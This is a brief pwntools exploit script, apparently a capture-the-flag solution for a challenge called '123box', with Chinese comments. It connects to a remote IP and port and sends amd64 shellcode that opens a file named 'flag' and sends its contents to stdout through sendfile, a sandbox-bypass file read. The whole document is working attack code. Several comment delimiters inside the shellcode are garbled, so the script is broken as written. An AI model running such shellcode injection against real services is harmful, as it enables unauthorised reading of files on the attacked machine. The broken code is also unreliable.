123box

from pwn import *

io = process("./pwn")

io = remote("39.97.50.51", 13966)
context(log_level="debug", arch="amd64", os="linux")

接收banner

io.recvuntil("> ")

重构shellcode，使用不同的写法

shellcode = '''
/* 将字符串"flag"压栈 /
mov rax, 0x67616c66
push rax
mov rdi, rsp / 文件名指针 /
xor rsi, rsi / O_RDONLY = 0 /
mov rax, 2 / sys_open */
syscall

mov rdi, 1       /* stdout */
mov rsi, rax     /* 打开的文件描述符 */
xor rdx, rdx     /* 偏移量 = 0 */
mov r10, 256     /* 读取256字节 */
mov rax, 40      /* sys_sendfile */
syscall


mov rax, 60
xor rdi, rdi
syscall

'''

payload = asm(shellcode)
io.send(payload)

io.sendlineafter("> ", "")
io.interactive()